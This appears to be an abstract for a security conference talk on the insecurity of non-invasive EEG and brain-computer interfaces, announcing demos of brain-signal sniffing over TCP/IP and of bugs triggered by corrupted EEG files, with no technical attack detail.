Electroencephalography (EEG) is a non-invasive method for recording and studying electrical activity (synapse between neurons) of the brain. It can be used to diagnose or monitor health conditions such as epilepsy, sleeping disorders, seizures, and Alzheimer disease, among other clinical uses. Brain signals are also being used for many other different research and entertainment purposes, such as neurofeedback, arts, and neurogaming.

 

I wish this were a talk on how to become Johnny Mnemonic, so you could store terabytes of data in your brain, but, sorry to disappoint you, I will only cover non-invasive EEG. I will cover 101 issues that we all have known since the 90s, that affect this 21st century technology.

 

I will give a brief introduction of Brain-Computer Interfaces and EEG in order to understand the risks involved in brain signal processing, storage, and transmission. I will cover common (in)security aspects, such as encryption and authentication as well as (in)security in design. Also, I will perform some live demos, such as the visualization of live brain activity, sniffing of brain signals over TCP/IP, as well as software bugs in well-known EEG applications when dealing with corrupted brain activity files. This talk is a first step to demonstrating that many EEG technologies are vulnerable to common network and application attacks.